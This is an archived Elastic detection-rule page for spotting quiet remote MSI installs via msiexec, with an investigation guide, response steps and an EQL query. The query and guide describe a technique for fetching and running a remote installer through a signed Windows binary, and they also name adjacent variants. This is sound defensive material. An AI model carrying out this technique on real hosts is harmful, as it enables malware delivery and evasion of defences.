Potential Remote Install via MsiExec

IMPORTANT: This documentation is no longer updated. Refer to Elastic's version policy and the latest documentation.

Potential Remote Install via MsiExec

Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware.

Rule type: eql

Rule indices:

endgame-*
logs-crowdstrike.fdr*
logs-endpoint.events.process-*
logs-m365_defender.event-*
logs-sentinel_one_cloud_funnel.*
logs-system.security*
logs-windows.forwarded*
logs-windows.sysmon_operational-*
winlogbeat-*

Severity: high

Risk score: 73

Runs every: 5m

Searches indices from: now-9m (Date Math format, see also Additional look-back time)

Maximum alerts per execution: 100

References: None

Tags:

Domain: Endpoint
OS: Windows
Use Case: Threat Detection
Tactic: Defense Evasion
Data Source: Elastic Endgame
Data Source: Elastic Defend
Data Source: Windows Security Event Logs
Data Source: Microsoft Defender XDR
Data Source: Sysmon
Data Source: SentinelOne
Data Source: Crowdstrike
Resources: Investigation Guide

Version: 5

Rule authors:

Elastic

Rule license: Elastic License v2

Investigation guide

edit

Triage and analysis

Investigating Potential Remote Install via MsiExec

Possible investigation steps

What remote installer behavior is preserved in the alert?
Focus: process.command_line, process.parent.name, and process.parent.command_line, especially quiet install or patch switches, the remote MSI or TRANSFORMS= source, and HTTP, raw-IP, public-hosting, or recognized distribution sources.
Implication: escalate for quiet remote installs, remote MSTs, or patches from suspicious infrastructure under interactive or script-launcher parents; lower concern only when the command, source, and parent match one recurring deployment, repair, or onboarding pattern.
Is the msiexec binary identity expected for Windows Installer?
Focus: process.executable, process.pe.original_file_name, process.code_signature.subject_name, process.code_signature.trusted, and process.hash.sha256.
Implication: escalate faster when msiexec is renamed, unsigned, untrusted, newly seen, or in a user-writable path; trusted Microsoft identity only confirms the proxy binary, not the remote install.
Does the parent and ancestry explain why msiexec ran?
Focus: process.parent.executable, process.parent.command_line, process.Ext.ancestry, user.id, and the affected host.
Implication: escalate when browser-adjacent, script, shell, WMI, or unusual interactive ancestry invokes the remote package without a stable workflow; lower concern when the parent, user, and host pattern fits a recognized management or support path.
Do process events show payload execution after the installer starts?
Focus: child starts on the same host.id where process.parent.entity_id matches process.entity_id, checking child process.command_line, process.executable, and process.hash.sha256. !{investigate{"description":"","label":"Child process activity from msiexec","providers":[[{"excluded":false,"field":"host.id","queryType":"phrase","value":"{{host.id}}","valueType":"string"},{"excluded":false,"field":"process.parent.entity_id","queryType":"phrase","value":"{{process.entity_id}}","valueType":"string"},{"excluded":false,"field":"event.category","queryType":"phrase","value":"process","valueType":"string"},{"excluded":false,"field":"event.type","queryType":"phrase","value":"start","valueType":"string"}]],"relativeFrom":"now-1h","relativeTo":"now"}}
Hint: use host.id + process.pid + tight alert window only when entity linkage is unavailable, and treat the result as weaker.
Implication: escalate when msiexec spawns shells, script interpreters, LOLBins, scheduled-task tools, or user-space binaries tied to the remote package; lower concern when follow-on activity stays inside the same signed product install flow.
Does the remote source and workflow context fit one legitimate package path?
Focus: URL, host, package name, or remote TRANSFORMS= in process.command_line, plus process.parent.executable, user.id, and host.id context for that source.
Hint: if network or file telemetry exists, correlate destination or artifact evidence with host.id + process.entity_id; use host.id + process.pid + tight alert window only without entity linkage. Missing file or network telemetry is unresolved, not benign, and does not block escalation when process evidence is strong. !{investigate{"description":"","label":"File or network activity by msiexec","providers":[[{"excluded":false,"field":"host.id","queryType":"phrase","value":"{{host.id}}","valueType":"string"},{"excluded":false,"field":"process.entity_id","queryType":"phrase","value":"{{process.entity_id}}","valueType":"string"},{"excluded":false,"field":"event.category","queryType":"phrase","value":"file","valueType":"string"}],[{"excluded":false,"field":"host.id","queryType":"phrase","value":"{{host.id}}","valueType":"string"},{"excluded":false,"field":"process.entity_id","queryType":"phrase","value":"{{process.entity_id}}","valueType":"string"},{"excluded":false,"field":"event.category","queryType":"phrase","value":"network","valueType":"string"}]],"relativeFrom":"now-1h","relativeTo":"now"}}
Implication: escalate when the source is raw IPs, public file hosting, look-alike vendors, temp/download staging, or infrastructure unrelated to the expected product; lower concern when source, launcher, user-host scope, and recovered corroboration fit one internal distribution point or vendor service.
Escalate on suspicious quiet-install intent, mismatched identity or lineage, unfit package source, or payload child execution; close only when process evidence and recovered corroboration align to one exact deployment, repair, or support workflow; preserve and escalate when evidence is mixed or visibility is incomplete. Use same-user or same-host related alerts after escalation only to size scope, not prove the local alert. !{investigate{"description":"","label":"Alerts associated with the user","providers":[[{"excluded":false,"field":"event.kind","queryType":"phrase","value":"signal","valueType":"string"},{"excluded":false,"field":"user.id","queryType":"phrase","value":"{{user.id}}","valueType":"string"}]],"relativeFrom":"now-48h/h","relativeTo":"now"}} !{investigate{"description":"","label":"Alerts associated with the host","providers":[[{"excluded":false,"field":"event.kind","queryType":"phrase","value":"signal","valueType":"string"},{"excluded":false,"field":"host.id","queryType":"phrase","value":"{{host.id}}","valueType":"string"}]],"relativeFrom":"now-48h/h","relativeTo":"now"}}

False positive analysis

First check whether http: or https: follows /i or /p directly (remote source — investigate) or sits inside a PROPERTY= value while the MSI source is local or relative (configuration URL — likely benign). The rule excludes local C:\ sources after /i; UNC, relative-path, or other local sources with property URLs need manual confirmation or customer-side exceptions.
Legitimate deployment, patching, or agent-repair workflows can use quiet remote msiexec. Confirm when process.command_line, process.parent.executable, user.id, and host.id align to one recurring product path. Do not close on a vendor-looking URL, signed msiexec, or familiar parent name alone.
Build exceptions from process.parent.executable, package source pattern in process.command_line, and stable host.id or user.id cohort. Avoid exceptions on msiexec, process.parent.name, domain suffix, or user.name alone.

Response and remediation

If confirmed benign, reverse any temporary containment and record the installer command, remote package source, parent launcher, signer/hash identity, affected user.id, affected host.id, and any recovered destination or artifact pattern. Create an exception only after the same workflow recurs across prior alerts from this rule.
If suspicious but unconfirmed, preserve the alert record, process tree, process.entity_id values, installer command line, remote URL or TRANSFORMS= value, parent command line, child process records, and any recovered package, destination, or provenance artifacts before containment. Apply reversible controls only when command, parent, or child-process evidence suggests active delivery; otherwise keep evidence collection open rather than starting cleanup.
If confirmed malicious, preserve process identifiers, command lines, recovered packages, and destination indicators before isolating the host, terminating msiexec or follow-on payloads, blocking confirmed indicators, or removing staged installers, extracted payloads, persistence changes, or scheduled-task material tied to the chain.
Post-incident hardening: close the delivery path that introduced the remote package, restrict msiexec remote-install use to controlled deployment tooling where feasible, review hosts where installer-elevation policy would increase impact, and document adjacent variants such as remote TRANSFORMS= abuse or DLL registration through /y and /z.

Setup

edit

Setup

This rule is designed for data generated by Elastic Defend, which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules.

Setup instructions: https://ela.st/install-elastic-defend

Additional data sources

This rule also supports the following third-party data sources. For setup instructions, refer to the links below:

Rule query

edit

process where host.os.type == "windows" and event.type == "start" and
  process.name : "msiexec.exe" and process.args : ("-i*", "/i*", "-p*", "/p*") and
  process.command_line : ("*http:*", "*https:*") and
  process.args : ("/qn", "-qn", "-q", "/q", "/quiet") and
  process.parent.name : (
    "sihost.exe", "explorer.exe", "cmd.exe", "wscript.exe", "mshta.exe",
    "powershell.exe", "wmiprvse.exe", "pcalua.exe", "forfiles.exe", "conhost.exe"
  ) and

  not process.command_line : (
        "*--set-server=*", "*UPGRADEADD=*" , "*--url=*", "*USESERVERCONFIG=*", "*RCTENTERPRISESERVER=*",
        "*app.ninjarmm.com*", "*zoom.us/client*", "*SUPPORTSERVERSTSURI=*", "*START_URL=*", "*AUTOCONFIG=*",
        "*awscli.amazonaws.com*", "*/i \"C:*", "*/i C:\\*"
  )

Framework: MITRE ATT&CK^TM

Tactic:
- Name: Defense Evasion
- ID: TA0005
- Reference URL: https://attack.mitre.org/tactics/TA0005/
Technique:
- Name: System Binary Proxy Execution
- ID: T1218
- Reference URL: https://attack.mitre.org/techniques/T1218/
Sub-technique:
- Name: Msiexec
- ID: T1218.007
- Reference URL: https://attack.mitre.org/techniques/T1218/007/
Tactic:
- Name: Command and Control
- ID: TA0011
- Reference URL: https://attack.mitre.org/tactics/TA0011/
Technique:
- Name: Ingress Tool Transfer
- ID: T1105
- Reference URL: https://attack.mitre.org/techniques/T1105/

« MsiExec Service Child Process With Network Connection Network Connection via MsXsl »